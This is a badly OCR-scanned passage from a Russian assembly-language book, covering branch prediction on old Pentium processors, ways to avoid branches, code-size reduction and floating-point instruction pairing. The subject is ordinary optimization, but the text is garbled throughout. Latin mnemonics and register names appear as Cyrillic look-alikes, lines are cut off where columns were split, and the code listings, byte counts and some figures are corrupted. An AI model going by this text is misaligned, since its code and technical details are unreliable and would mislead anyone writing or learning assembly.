предсказывается верно, тогда та же последовательность, но прочитанная задом-наперел. 
также будет предсказана верно, как и та же последовательность, но с инвертированным 
битами. Рассмотрим последовательность 001011 из таблицы. Изменение порядка битов 
на обратный дает 1101000. Инвертирование всех битов дает 1110100. Изменение порядка 
битов и инвертирование одновременно 0010111. Все эти четыре последовательности 
будут распознаны. Циклический сдвиг всех битов на одну позицию влево дает 001011. 
Это, конечно, не новая последовательность, а всего лишь чуть сдвинутая версия той, Ко- 
торая уже рассматривалась. Все последовательности, которые могут быть выведены 
от одной из перечисленных в таблице с помощью изменения порядка битов, инвертиро" 
вания и циклического сдвига также могут быть разпознанны. 


хм А р 
У механизма распознавания последовательностей уходит два периода на то, чтобы 


усвоить регулярно повторяющуюся последовательность после того, как был создан соот 


ветствующий элемент ВТВ. Последовательность неправильных предсказаний в периой | 


обучения не воспроизводима, вероятно, из-за того что элемент. ВТВ содержит нечто 7 
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1о того, как резервируется. Так как элементы ВТВ резервируются по случайной схеме, 
то предсказание того, что произойдет в течении начального периода, маловероятно. 


6.22.2.5. Обработка отклонений от регулярных последовательностей (РММХ, РРго, 
р2 и РЗ). Механизм предсказания также довольно хорошо справляется с обработкой 
‘почти регулярных' последовательностей или отклонений от регулярной последователь- 
ности. Он не только заучивает, как выглядит регулярная последовательность, он также 
изучает, какие существуют отклонения от нее. Если отклонения все время одни и те же, 
тогда он будет помнить, что идет после отклонения, и оно будет стоить толко одно не- 
правильное предсказание. 


Пример 
0001110001110001110001011100011100011100010111000 


В этой последовательности 0 означает не-переход, а | — переход. Механизм предсказа- 
ния делает вывод, что повторяющаяся последовательность равна 000111. Первое отклоне- 
ние — это неожиданный 0, который отмечен знаком "^'. После этого следующие три перехо- 
да могут быть неправильно предсказаны, потому что механизм предсказания еше не знает, 
что идет после 0010, 0101 и 1011. После одного или двух таких отклонений механизм пред- 
сказания делается вывод, что после 0010 идет 1, после 0101 идет 1, а после 1011 идет 1. Это 
означает, что после двух отклонений одного и того же вида, механизм предсказания точно 
знает как их обрабатывать, допуская только одно неправильное предсказание. 

Механизм предсказания очень эффективени, когда происходит смена одной регулярной 
последовательности на другую. Если, например, первоначально была последовательность 
000111 (с периодом 6), которая повторялась много раз, потом последовательность 01 
(период 2) — много раз, а затем произошел возврат снова на последовательность 00011 1, 
вэтом случае механизм не должен снова запоминать последовательность 000111, так как 
счетчики, которые были использованы для этой последовательности, остались в неприкос- 
новенности. После нескольких смен последовательностей с одной на другую, механизм 
также предсказывает, как обрабатывать изменения ценой только одного неправильного 
предсказания во время переключения одной последовательности на другую. 


6.22.2.6. Последовательности, не предсказываемые совершенно (РММХ, РРго, Р2 
иРЗ). Простейшая последовательность, которая не может быть предсказана совершенно, 
` это переход, который совершается каждый 6-й раз. Рассмотрим последовательность: 


000001000001000001 


л^ л^ л^ 


ар ар ар 


За последовательностями 0000 следует 0 в позициях, помеченных 'а', и 1, в позициях, 
помеченных '5'. Комбинация аб влияет на счетчик с номером 0, который постоянно увели- 
Чивает и уменьшает свое значение. Если счетчик 0 был вначале равен 0 или 1, тогда его 
Значение будет колебаться между 0 и 1. Это приведет к неправильному предсказанию 
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в позиции Б. Если счетчик 0 был в самом начале равен 3, тогда его значение будет изме- 
няться в пределах 2 и 3, что приведет к неправильному предсказанию в позиции а. Худший 
случай — когда его состояние было в начале равно 2. Он будет изменяться в пределах | —2, 
что приведет к неправильному предсказанию в обоих позициях. (Это аналогично худшему 
случаю для Р1, объясненному выше). Какая ситуация получится, зависит от предыдущих 
значений элемента ВТВ до того, как он был зарезервирован. Но это проконтролировать 
невозможно, так как элементы ВТВ выбираются случайно. 

В принципе, можно избежать худший случай, если в самом начале задать специально 
спроектированную последовательность, чтобы перевести счетчик в желаемое состояние. 
Но такой подход трудно рекомендовать как средство оптимизации, так как он значитель- 
но усложняет код и любая информация, которая будет помещена в счетчик, утеряется 
при следующем прерывании или переключении задач. 

6.22.2.7. Полностью случайные последовательности (РММХ, РРго, Р2 и РЗ). Способ- 
ность распознавания последовательностей имеет изъян в случае полностью случайных 
нерегулярных последовательностей. | | 

В табл. 6.7 приводится эспериметально полученный набор неверных предсказаний 
для полностью случайных нерегулярных последовательностеи. 


Таблица 6.7. «Отношение успешных предсказаний к неуспешным для полностью 
| случайных нерегулярных последовательностей» 


отношение переход/непереход часть иеверных предсказании 


0.001/0.999 0.001001 
0.01/0.99 0.0101 
0.05/0.95 0.0525 
0.10/0.90 0.110 
0.15/0.85 0.171 
0.20/0.80 0.235 
0.25/0.75 0.300 
0.30/0.70 0.362 
0.35/0.65 0.418 
0.40/0.60 0.462 
0.45/0.55 0.490 
0.50/0.50 0.500 


. г. 
Число неправильных предсказаний было бы выше, без средств распознавания посл 
й м 
довательностей, поскольку процессор пытается найти повторяющиеся блоки даже там, 
где нет никакой закономерности. 


ГкИХ 
6.22.2.8. Короткие ЦИКЛЫ (РММХ). Предсказание переходов ненадежно в коро мы 
циклах, так как у механизма распознавания последовательностей нет времени, чтоб 
2 


$ 
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обновить свои данные перед очередной встречей с командой перехода. Это означает, 
простые последовательности, которые в обычном случае были бы предсказаны со 
шенно, не будут распознанны. И наоборот, некоторые последовательности, кото 
в обычном случае не были бы распознаны, будут предсказаны в коротком цикле. Наг 
мер, цикл, который всегда повторяется 6 раз, имел бы последовательность 111110 

инструкции ветвления в начале цикла. В этой последовательности было бы одно или 
неправильных предсказаний за итерацию, но в коротком цикле не будет ни одного. Тс 
самое касается цикла, который повторяется 7 раз. С другим количеством повторе 
предсказуемость будет еще хуже в коротких циклах. Это означает, что количество 

вторений, равное 6 или 7, более предпочтительно для коротких циклов. Для оптимиза 
следует развернуть цикл, сделав его тело больше. 

Чтобы узнать, подпадает ли цикл на РММХ под действие вышеизложенных пра! 
можно подсчитать количество инструкций в цикле. Если количество равно 6 или мень 
тогда цикл является коротким. Если инструкций 7 и больше — распознавание послед. 
тельностей будет работать нормально. Довольно странно, что количество тактов, к 
рое требуется для выполнения инструкций, не играет роли, так же как, и спариваем‹ 
инструкций и вызываемые ими задержки. Сложные целочисленные инструкции при г 
счете не учитываются. В цикле может быть много таких инструкций, и он будет себя | 
ти как короткий. Сложная целочисленная инструкция — это не спариваемая целочис; 
ная инструкция, которая всегда требует больше одного такта. Сложные инструк 
с плавающей запятой и инструкции ММХ выполняются одна за другой. Следует п‹ 
мать, что это правило выведено эвристическим путем и не на 100% надежно Мо: 
самостоятельно провести тестирование, используя датчик качества (регистр 35) РМ] 
чтобы подсчитать количество неправильно предсказанных переходов. Результаты те 
также не могут быть полностью надежны, потому что предсказания переходов зав! 
от истории элемента ВТВ до начала эксперимента. 


Короткие циклы на РРго, Р2 и РЗ предсказываются нормально, каждая итерг 
занимает минимум два цикла. 


6.22.2.9. Относительные переходы и вызовы (РММХ, РРго, Р2 и РЗ). Распознаве 
последовательностей не работает в случае относительных переходов и вызовов, а ВТ! 
может запомнить больше одного адреса назначения для косвенного вызова. Предск: 
вается переход к тому же адресу, что и в предыдущий раз. 

6.22.2.10. Инструкции ЛЕСХА, и ГООР (РММХ). На РММХ распознавание послед 
тельностей не работает с этими двумя инструкциями, просто в качестве предсказ: 
выбирается то, что произошло в последний раз. Этих двух инструкций следует избе 
в критическом коде для РММХ (на РРго, Р2 и РЗ предсказания осуществляются с п‹ 
щью распознавания последовательностей, но специальные инструкции циклов все р: 
проигрывают по сравнению с комбинацией РЕС ЕСХ / Л\/.). 








412 Ассемблер в задачах защиты информа _ 


6.22.2.11. Возвраты (РММХ, РРго, Р2 и РЗ). У процессоров РММХ, РРго, Р2 и Р3 есть 
буфер стека возвратов (В$В -— гевит звасК БиЙег), который используется для предсказыва. 
ния инструкций возвратов. К5В работает как ЕТЕО буфер. Каждый раз, когда выполняется 
инструкция вызова, соответствующий адрес возврата помещается в К5В. И каждый раз 
когда выполняется инструкция возврата, адрес возвращения извлекается из ВЗВ и исполь. 
зуется для предсказывания возврата. Этот механизм обеспечивает корректное предсказание 
этих инструкций, когда одна и та же подпрограмма вызывается из разных мест. 

Чтобы этот механизм работал правильно, следует убедиться, что все вызовы и воз. 
враты соответствуют друг другу. Если производительность играет решающую роль, ни. 
когда не следует выходить из подпрограмм безвозвратно и никогда использовать возврат 
в качестве косвенного перехода. 

КЗВ может содержать до 4 элементов в РММХ, шестнадцать в РРго, Р2 и РЗ. В случае 
когда В5Р пуст, инструкция возврата предсказывается, как и косвенный переход, то есть 
ожидается переход туда, куда он был совершен в последний раз. 

На РММХ, когда подпрограммы вложены друг в друга более, чем на 4 уровня, все 
возвраты, кроме 4 самых вложенных, используют простой механизм предсказания, пока 
не происходит новых вызовов. Инструкция возврата, находящаяся в ВЗВ, занимает один 
элемент ВТВ. Подпрограммы, вложенные более чем на 4 уровня, не являются чем-то 
необычным, но только внутренние уровни максимально эффективны в плане скорости, 
не считая возможности рекурсивных процедур. 

На РРго, Р2 и РЗ, когда подпрограммы вложены глубже, чем на 16 уровней, внутрен- 
ние 16 уровней используют ВЗВ, в то время как все последующие возвраты из внешних 
уровней предсказываются неверно, поэтому рекурсивные процедуры не следует делать 
вложенными более чем на 16 уровней. 


6.22.2.12. Статическое предсказывание (РММХ). Инструкция передачи управления, 
которая не встречалась ранее или которая не находится в ВТВ, всегда предсказывается как 
невыполняющаяся на РММХ. Не играет роли, куда совершается переход: вперед или назад. 

Инструкция перехода не получит элемент ВТВ, если она постоянно невыполняется. 
Как только она выполнится, она попадет в ВТВ и будет оставаться там вне зависимости 
от того, сколько раз она не выполнится в дальнейшем. Инструкция передачи управления 
может исчезнуть из ВТВ только, если она была вытеснена другой инструкцией передачи 
управления. 

Любая инструкция передачи управления, которая переходит на адрес, непосредствен- 
но следующий за ней же, не получает элемент в ВТВ: 


ОМР 5НОВТ 11 
ЪЬ: 


Эта инструкция никогда не получит элемент в ВТВ и поэтому всегда будет предска- 
зываться неправильно. 

6.22.2.13. Статическое предсказывание (РРго, Р2 и РЗ). На РРго, Р2 и РЗ инструкция 
передачи управления, которая не встречалась ранее или которой нет в ВТВ, предсказывается 








Е; 
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как невыполняющаяся, если она указывает вперед, и как выполняющаяся, если она указыв 
назад (например, цикл). Статическое предсказываение занимает больше времени, чем ди 
мическое предсказывание на этих процессорах. 

Всли код не откэширован, то предпочтительнее, чтобы наиболее часто встречающ: 
ся инструкция перехода не выполнялась, чтобы улучшить доставку инструкций. 

6.22.2.14. Закрытые переходы (РММХ). На РММХ существ 
ции передачи управления разделят один и тот же элемент 
слишком близко друг к другу. Очевидным результатом стане 
предсказываться неправильно. 

Элемент ВТВ для инструкции передачи управления определяется по битам 2 — 
адреса последнего байта инструкции. Если две инструкции передачи управления ная 


дятся так близко друг от друга, что отличаются только битами 0 
блема разделяемого элемента ВТВ: 


САЦЬ Р 
УМС ЗНОВТ т 


ует риск, что две инстр: 
ВТВ, если они находят 
т то, что они всегда буд 


— 1 адресов, т. е. пр 


Если последний байт инструкции САМ, и последний байт инструкции Л\С находят 
внутри того же ‘слова памяти, то результат — потери производительности. Следует изучи 
сгенерированный ассемблерный листинг, чтобы увидеть, разделены ли эти два адреса гран 
ЦЕИ ДВОИНОГО Слова или нет (граница двойного слова — это адрес, который делится на 4). 

Есть несколько путей решить эту проблему. 


Переместить код чуть вверх или вниз в памяти, чтобы меж 


ь ду двумя адресами бы. 
граница двойного слова. р 


Изменить короткий переход на ближний переход, 
чуть вниз. 


и Поместить какую-либо инструкцию между САПЛ, и ЛС. Это самый простой и еди 
ственный метод, если неизвестно, где находятся границы двойного слова, в случ: 
если сегмент кода не выровнен по границе двойного слова или потому что код см 
щается то вверх, то вниз в результате изменений в предшествущем коде. 


чтобы конец инструкции сместил. 


САЪЬ Р 
МОУ ЕАХ, БАХ ; добавим два байта й 
; чтобы быть спок 
УМС ЗНОВТ Ь | и 


, Если нужно избежать проблем на Р1, тогда следует поместить вместо МОТ две МО] 
тобы предотвратить спаривание. 


Инструкция ВЕТ особенно безза 


щитна перед этой проблемой, потому ее размер всет 
дин байт длиной. УР р 


УМА МЕХТ 
ВЕТ 


Здесь может потребоваться вставить три байла: 
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ион пвненеснинии АНЯ ИА 
97 МЕХТ 
МОР 
МОУ БАХ, БАХ 
ВЕТ 


6.22.2.15. Последовательные вызовы или возвраты (РММХ). Возникают потери 
когда первая пара инструкций, следующая за меткой-целью вызова, содержит другой 
вызов или возврат, следующий сразу после предыдущего возврата. 


Пример 
ЕОМС1  РВОС . МЕАВ 


МОР ; избегаем вызова после вызова 
МОР 


САБЬ РимС2 
САБЬ РОМСЗ 
МОР ; избегаем возврата после возврата 


ВЕТ 
РОМС БМОР 


Требуется две МОР перед ‘СА, ЕОМС?", потому что одна МОР будет спариваться 
с САГ... Одной МОР достаточно перед ВЕТ, потому что эта инструкция неспариваема. 
Не требуется МОР между двумя инструкциями САЦ, потому что нет потерь при вызове 
после возврата (на Р1 потребуется здесь две МОР). 

Подобные потери в последовательных вызовах возникают только, когда одни и те же 
подпрограммы вызываются из более чем одного места (вероятно, что это происходит 
из-за обновления КВ). Последовательные возвраты всегда приводят к потерям. Иногда 
возникает небольшая задержка при переходе после вызова, но нет потерь при возврате 
после вызова, вызова после возврата, перехода, вызова или возврата после перехода или 
перехода после возврата. 


6.22.2.16. Последовательные переходы (РРго, Р2 и РЗ). Переход, вызов или возврат н8 
может выполниться в первый такт после предыдущего перехода, вызова или возврата. 
Поэтому последовательные переходы занимают по два такта на переход. В силу опреде 
ленных причин цикл требует не менее двух тактов на итерацию на этих процессорах. 


6.22.2.17. Проектирование предсказуемых переход в (РММХ, РРго, Р2 и РЗ). Много" 
ветвенные переходы (реализующие высокоуровневые выражения з\/с/сазе) реализуютс® 
как список адресов переходов или как дерево инструкций переходов. Так как косвенные пере” 
ходы предсказываются плохо, то последний метод может быть более предпочтителен, если 
дерево будет представлено в виде хорошо предсказуемой последовательности и при наличий 
достаточного количества элементов ВТВ. В случае использования предыдущего метод® 
рекомендуется, чтобы адреса переходов были помещены в сегмент данных. 

Можно реорганизовать код так, чтобы последовательности переходов, которые #% 
предсказываются совершенно, были заменены другими последовательностями. Рассмо" 
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Ион оно во бои ровер ионов ини ото ба нии ооо чи о воин о бов ана ии и ии нано нинии оно а овен но вания 9 дов ия наи ино о бо нниповнииие ...., 


им викл, который выполняется 20 раз. Условный переход внизу цикла будет выпол- 
ияться 19 раз и на 20 раз - нет. Эта последовательность регулярна, но не будет иденти- 
ицирована механизмом распознавания последовательностей, поэтому невыполнение 
данной инструкции будет всегда предсказываться неправильно. Можно сделать два вло- 
женных цикла по 4 и 5 повторений или развернуть цикл в четыре раза и позволить ему 
выполниться 5 раз, чтобы были только распознаваемые последовательности. Этот вид 
сложных схем оправдывает себя только на РРго, Р2 и РЗ, где неверное предсказание сто- 
ит слишком дорого. Для циклов с большим количеством повторений нет смысла бороть- 
ся содним неправильным предсказанием. 


6.22.3. Избегание переходов (все процессоры) 


Есть много причин, по которым желательно снизить количество переходов, вызовов 
и возвратов: 


и неверные предсказания стоят очень дорого; 


и взависимости от процессора могут возникнуть различные потери при последователь- 
ных вызовах; 

и инструкции перехода могут выталкивать друг друга из буфера переходов; 

Ш возврат занимает 2 такта на Р1 и РММХ, вызовы и возвраты генерируют 4 мопа 
на РРго, Р2 и РЗ; 

и на РРго, Р2 и РЗ доставка инструкций может быть задержена после перехода (глава 


15), а вывод из обращения может быть менее эффективным для совершенных пере- 
ходов, чем для других мопов (разд. 6.18). 


Вызовов и возвратов можно избежать, если заменить короткие процедуры макросами. 
Во многих случаях можно снизить количество переходов, перегруппировав код. Напри- 
мер, переход на переход можно заменить переходом к конечному адресу назначения. 
В некоторых случаях это можно сделать даже с условными переходами, если условие 
дублируется или заранее известно. Переход на возврат можно заменить возвратом. Если 
нужно устранить возврат на возврат, не следует манипулировать стэковым указателем, 
потому что это будет создавать помехи механизму предсказания, основывающимся на 
КУР. Вместо этого можно заменить предыдущий вызов на переход. Например, "САГЕ 
РКО! / ВЕТ' можно заменить на '/МР РКОТ', если РКО] заканчивается тем же КЕТ. 

Проблему возврата на возврат также можно устранить переходом, дублируя код, на 
который совершается переход. Это может быть полезным, если есть двухнаправленная 
Ветвь внутри цикла или до возврата. 
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А СМР [БАХ+4*ЕОХ] , ЕСХ 
ЧЕ В 
САЪЬ х 
УМР С 
В САЪЬ у 
С мс вОХ 
9МР А 
МОУ БОР, ЕВР 
РОР ЬВР 
ВЕТ 


Переход на С можно устранить, продублировав эпилог цикла. 


А: СМР [ЕАХ+4*ЕОХ],ЕСХ 
ЧЕ В 
САБЬ х 
ТС БОХ 
ЗМ А 
ЗМР р) 
В: САБЬ У 
С: ТС вОХ 
ЧР А 
О: МОУ ВБР, ЕВР 
РОР ЬВР 
ВЕТ 


Наиболее часто выполняющийся переход здесь должен быть первым. Переход на 0 

находится вне цикла и поэтому менее критичен. Если переход выполняется так часто, 

Ми 

что его нужно тоже оптимизировать, необходимо заменить его тремя инструкциями, 
которые следуют за О. 


6.22.4. Избегание условных переходов, 
манипулируя флагами (все процессоры) 


ед: 
Самое главное — избавиться от условных переходов, особенно если они плохо о 
сказуемы. Иногда возможно получить тот же эффект, искусно манипулируя 
и флагами. 


со 
ХОВ БАХ, ЕОХ 
ЗОВ БАХ, ЕБХ 


(НаР1 иРММХ можно использовать 'МОУ ЕОХ,ЕАХ / ЗАВ ЕОХ,31' вместо СРО). 
Флаг переноса особенно полезен для следующих трюков: 


ВЫ. 
ы 





Глава 6. Оптимизация 


ТЕРРА а ооово ванные 


и установка флага переноса, если значение равно нулю: СМР [УАТМЕ],1; 


и установка флага переноса, если значение не равно нулю: ХОВ ЕАХ.ЕАХ / С 
ЕАХ[УАПОЕ]; 


увеличение счетчика на 1, если установлен флаг переноса: АРС ЕАХ,0; 

установка бита каждый раз, когда установлен флаг переноса: ВСГ. ЕАХ,1; 

генерация битовой маски, если установлен флаг переноса: $ВВ ЕАХ,ЕАХ; 
установка бита при определенном условии: ЗЕТсоп4 АГ; 

установка всех бит при определенном условии: ХОК БАХ,БАХ / ЗЕТМсопа АТ, / РЕ 
ВАХ (в последнем примере условие должно быть сформулировано наоборот). 
Пример нахождения меньшего из двух беззнаковых чисел: # (6 <а)а=Ь. 


ЗОВ ЕВХ, ЕАХ 
УВВ ЕСХ, ЕСХ 
АМО БСХ, ЕВХ 
АБО БАХ, ЕСХ 


А вот пример, как выбрать между двумя числами: № (а!= 


СМР БАХ, 1 

ЗВВ БАХ, ЕАХ 
ХОВ ЕСХ, ЕВХ 
АМО ВАХ, ЕСХ 
ХОК ЕАХ, ЕВХ 


0) а=Ъ; е!зеа = с: 


Стоит применять подобные трюки или нет, зависит от того, насколько предсказумь 
условные переходы, есть или нет возможность спаривания инструкций, есть или не’ 
рядом другие переходы, из-за которых мог ут возникнуть потери. 


6.22.5. Замена условных переходов условными 
перемещениями (РРго, Р2 и РЗ) 


› Где это возможно. Для того 
д выполнялся на всех процессорах, можно сделать две версии критичного кода: 


процессоров, которые поддерживают инструкции условного перемещния, дру- 


Чтобы ко 


ОДНУ для 
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гую для тех, которые их не поддерживают (см. разд. 6.27.10, чтобы узнать, как пр 
лить, поддерживает ли процессор условные переходы). 

Потери из-за неправильного предсказания перехода могут быть настолько выс 
что имеет смысл заменить их условными перемещениями данных, даже если это 6 д 
стоить несколько дополнительных инструкций. У инструкций условного перехода а 
один недостаток: они делают цепочки зависимости длинее. Условное перемещени, 
ждет готовности обоих операндов-регистров, даже если требуется только один из их 
Условное перемещение ждет готовности трех операндов: флаг условия и еще два те, 
ранда перемещения. Нужно точно знать, может ли один из этих трех операндов ри. 
вести к задержкам из-за ошибок в работе с кешем или из-за цепочек зависимости. Если 
флаг условия доступен задолго до операндов операции перемещения, можно испол, 
зовать инструкции перехода, потому что возможное неправильное предсказание может 
быть преодолено, пока ожидается готовность операнлов перемещения. В тех ситуаци. 
ях, где нужно долго ждать операнд перемещения, который потом еще может и 
понадобиться, инструкция перехода будет быстрее, чем условный переход, несмотря 
на потери, связанные с возможным неправильным предсказанием. Обратная ситуация 
возникает, когда флаг условия задерживается, а оба операнда перемещения доступны 
ранее. В этой ситуации условный перенос данных более предпочтителен, чем инструк 
ция перехода, если вероятно неправильно предсказание. 












6.23. Уменышение размера кода 


Как уже говорилось в разделе 6.7, размер кэша кода в зависимости от поколения пре- 
цессоров Репйит равен 8 или 16 килобайтам. Если есть подозрение, что критические части 
кода не поместятся в кэш, тогда можно подумать о том, чтобы уменышить их размер. 

32-битный код обычно больше по размеру, чем 16 битный, потому что в нем и 
и константы занимают 4 байта, а в 16-битном режиме только два. Тем не менее, ви 
битном коде есть другие потери, такие как префиксы и проблемы с соседнеми сов ея 
памяти (см. разд. 6.10.2). Некоторые дополнительные методы уменьшения размера 
будут обсуждаться в этом разделе. 

Адреса перехода, адреса данных и константы занимают меньше места, е 
ние находится между -128 до +127. байт, в 

Для адресов переходов это означает, что короткие переходы занимают два ловный 
время как переходы более чем 127 байт занимают 5 байтов, если переход 6езУ 
и 6 байтов, если условный. ` тут быт 
Таким же образом адреса данных занимают меньше места, если они 
выражены как указатель в интервале от -128 до +127. 










сли их ЗН 
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Пример 
МОУ ЕВХ, 05: [100000] / АБО ЕВХ, 05: [100004] 
уменьшаем размер: 
моу БАХ, 100000 / МОУ ЕВХ, [ЕАХ] / АШБ ЕВХ, [ЕАХ+4] 


; 12 байт 


; 10 байт 


Преимущество использования указателя становится еще более очевидным, если он 
‚пользуется повторно. Хранение данных в стеке и использование ЕВР или ЕЗР в каче- 
“зе указателя сделает код меньше, чем если бы использовались абсолютные адреса. 
‚(пользование РОЗН и РОР для записи и чтения временных данных еще оказывается 
„де короче. 

Константы могут также занимать меньше места, если их значения лежат в диапазоне - 


3 и +127. Большинство инструкций с числовыми операндами имеют короткую форму 
„я го ? 
ве операнд — это один байт со знаком. 


Примеры 
РОЗН 200 $; 5 байт 
РОЗН 100 ; 2 байт 
АБР БВХ, 128 ; 6 байт 
$0В ЕВХ,-128 ; 3 байт 


Самая важная инструкция с числовым операндом, у которой нет короткой формы, это МОУ. 


Примеры 
МОУ ЕАХ, 0 $ 5 байт 
Можно заменить на: 
ХОВ ЕАХ, БАХ ; 2 байта 
И 
МОУ БАХ, 1 ; 5 байтов 
Можно заменить на: 
м ХОВ ЕАХ, ЕАХ / 1МС ЕАХ ; 3 байта 
и: 
РОЗН 1 / РОР ЕАХ ; 3 байта 
МОУ ЕАХ, -1 5 байта 
“Эно заменить на: 
ОВ ЕАХ, -1 ; 3 байта 
сли один и то 
ть т же адрес или константа используется несколько раз, ее можно загру- 
Регистр. | у 


о . 
ив У с 4-байтным чи 


ук словым операндом иногда можно заменить на арфметическую 


ЦИЮ, если известно значение регистра до МОУ. 
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Пример 
МОУ [пеп1},200 ; 10 байтов 
МОУ [пещ2]},200 ; 10 байтов 
МОУ [пеп3], 201 ; 10 байтов 
МОУ БАХ, 100 ; 9 байтов 
МОУ ЕВХ, 150 ; 5 байтов 


Предполагая, что значения тет] и тет3 находятся в пределах -128/127 байтов от 
ет12, это можно изменить на: 


МОУ ЕВХ, ОРЕЗЕТ пеп2 ; 5 байтов 
МОУ БАХ, 200 ; 5 байтов 
МОУ [ЕВХ+меп1] -меп2 ],ЕАХ $ 3 байта 
МОУ [ЕВХ], БАХ ; 2 байта 
ТС БАХ ; 1 байт 

МОУ [{ ЕВХ+пей3 -пеп2],ЕАХ ; 3 байта 
ЗОВ БАХ, 101 ; 3 байта 
ЪЕА ЕВХ, [ЕАХ+50 ] ; 3 байта 


Следует остерегаться задержек АС! в инструкции ГЕА (для Р1 иРММХ). 

Также стоит учитывать то, что разные инструкции имеют разную длину. Следующие 
инструкции занимают только один байт и поэтому очень привлекательны: РОЗН тер, 
РОР гео, ПЧС ге232, ОЕС гез32. ПМС и ПЕС с 8-битовыми регистрами занимают 2 байта, 
поэтому ПМС ЕАХ' короче, чем 'ИМС АГ. 

'ХСН@ ЕАХ,гез' также однобайтовая инструкция и поэтому занимает меньше места, 
чем МОУ ЕАХге=', но это медленнее. 

Некоторые инструкции занимают на один байт меньше, когда они используют акку- 
мулятор, а не другой регистр: | 

МОУ ЕАХ, 05: [100000] меньше, чем МОУ ЕВХ, О 5: [100000] 
АО БАХ, 1000 меньше, чем АРО ЕВХ,1000 

Инструкции с указателями занимают на один байт меньше, чем когда они используют 
адресацию по базе (не ЕЗР) со сдвигом, а не косвенную адресацию с масштабированием, 
или и то, и другое вместе, или ЕЗР в качестве базы: 

МОУ ЕКАХ, [агхау] [ЕВХ] меньше, чем МОУ ЕАХ, [аггау] [ЕВХ*4 } 
МОУ БАХ, [ЕВР+12] меньше, чем МОУ ЕАХ, [Е$ЗР+12] 

Инструкции с ЕВР в качестве базы без смещения занимают на один байт больше, 

при использовании других регистров: 


МОУ ВАХ, (ЕВХ] меньше чем МОУ ЕАХ, [ЕВР], но 
МО\ ЕАХ, [ЕВХ+4] такого же размера, как и МОУ ЕАХ, [ЕВР+4 ] 


чем 


Также адресация со сдвигом бывает выгоднее, чем адресация с масштабированием 
.ЕА ЕАХ, [ЕВХ+ЕВХ] короче, чем ЪЕА ЕАХ, [2*ЕВХ] 
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А. Работа с числами с плавающей запятой 


(Р1иРММХ) 


Инструкции с плавающей запятой не могут спариваться так, как это делают целочис- 
ленные инструкции, не считая некоторых случаев, определяемых следующими правилами: 


в первая инструкция (выполняющаяся в О-конвейере) должна быть ЕГО, ЕАОО, ЕЗОВ, 
ЕМОГ, ЕОГМ, ЕСОМ, ЕСН$ или ЕАВ$; 


« вторая инструкция (в У-конвейере) должна быть ЕХСН; 


, инструкция, следующая за ЕХСН, должна быть инструкцией плавающей запятой, 
иначе ЕХСН спарится несовершенно и займет лишний такт. 


Это особенное спаривание играет важную роль, что вкратие будет объяснено ниже. 

Хотя, как правило, инструкции с плавающей запятой не могут спариваться, многие 
из них конверизуются, т. е. одна инструкция может начать выполнение до того, как будет 
закончена предыдущая инструкция. 


РАОО $Т(1),5Т(0) ; такты 1-3 
РАО $Т(2),5Т(0) ; такты 2-4 
РАБО $5Т(3)},5Т(0} ; такты 3-5 
ЕРАОР $Т(4),5Т(0) ; такты 4-6 


Очевидно, что выполнение двух инструкциий не может пересекаться, если второй 
инструкции нужен результат первой. Так как почти все инструкции плавающей запятой 
работают с вершиной стека регистров $Т(0), возможностей сделать их независимыми 
1руг от друга не очень много. Решение этой проблемы состоит в переименовании реги- 
стров. Инструкция ЕХСН в реальности не обменивает содержимое двух регистров, она 
только меняет их имена. Инструкции, которые помещают или извлекают значение 
# стека регистров также работают с помощью переименования. Переименование реги- 
‘Тров на РепНит настолько хорошо оптимизировано, что даже желательно использова- 
ыы переименования регистров. Переименование регистров никогда не вызывает задер- 
можно даже переименовать регистр более чем один раз за такт, например, когда 

ется ЕГО или ЕСОМРР с ЕХСН. 
о ть фото чтобы петр 
руга. 


РО 


[а1} ; такт 1 
РАОО [а2] ; такт 2-4 
ЕО [51] ; такт 3 ' 
РАОР [52] ; такт 4-6 
РГР [с<1] ; такт 5 
РАОО [с2] ; такт 6-8 
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ЕХСН $1(2)} ; такт 6 
РАО . [а3] ; такт 7-9 
ЕХСН $71(1} ; такт 7 
РАБО 163] ; Такт 8-10 
ЕХСН $7т{2} ; такт 8 
РАРР [с3) ; такт 9-11 
ЕХСН $7{1) ; такт 9 
РАО [а4] ; такт 10-12 
ЕХСН $71(2) ; такт 10 
РАО [54] ; такт 11-13 
РХСН $Т(1) ; такт 11 
РАОР 1<4] ; такт 12-14 
ЕХСН $71(2} ; такт 12 


В вышеприведенном примере создаются три независимые ветви. Каждая инструкция 
ЕАО занимает 3 такта, поэтому можно каждый такт начинать с выполнения новой 
ЕАРО. Когда начинается выполнение ветви 'а', есть время, чтобы начать выполнение 
двух новых инструкций РГАОО в ветвях 'Ъ' и 'с' до возвращения к ветви 'а'; поэтому каж- 
дый третий ЕАОО принадлежит той же ветви. Можно использовать инструкции ЕХСН 
каждый раз, когда необходимо, чтобы $Т(0) стал равен регистру, который принадлежит 
к желаемой ветви. Как видно из примера, это образует регулярную последовательность, 
но нужно уяснить, что инструкции ЕХСН повторяются с периодом, равным двум, в то 
время как у ветвей период равен трем. Поэтому следует проработать этот пример, чтобы 
понять, где находится какой из регистров. 

Все версии инструкций ЕАРО, ЕЗОВ, ЕМОГ, и ЕИ.О занимают три такта и конвейеризу- 
ются, поэтому вышеописанный метод можно применять и с этими инструкциями. Использо- 
вание переменных в памяти не отнимает больше времени, чем использование регистров, если 
переменная в памяти находится в кэше первого уровня и правильно выравнена. 

У всех правил есть исключения, и у вышеизложенного правила они тоже есть: нельзя 
начать выполнение инструкции ЕМОТ, на следующем такте после другой инструкций 
ЕМУЕ, потому что ЕМУТ, не может спариваться совершенно. Рекомендуется поместить 
некоторую инструкцию между двумя ЕМОГ.. 





РЬО [а1] ; такт 1 

РЬО [51] ; такт 2 

РО [<1] ; такт 3 

РХСН $Т{2} ; Такт 3 

ЕМОЬ [а2] ; такты 4-6 

ЕХСН ; такт 4 

ЕМОТ 152] ; такты 5-7 (задержка) 
ЕХСН $Т(2} ; такт 5 

ЕМОЬ [с2] ; такты 7-9 (задержка) 
ЕХСН ; такт 7 

РТР [а3] ; такты 8-9 


— 
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ЕХСН ; такт 10 ({неспарены)} 
Е5ТР [Ъ3) ; такты 11-12 
ЕЗТР [с3] ; такты 13-14 


Здесь есть задержка между ЕМ\. [62] и между ЕМТЕ. [2], потому что другая ЕМОТ., 
‚ачалась на предыдущем такте. Можно улучигить этот код, поместив инструкции ЕГО 
цежду ЕМУГами. 


РГР [а1] ; Такт 1 
ЕМОЬ [а2] ; такт 2-4 
РР 151] ; такт 3 
РМО [52] ; такт 4-6 
РЫБ [<1] ; такт 5 
ЕМОБ [22] ; такт 6-8 
РХСН $7(2) ; такт 6 
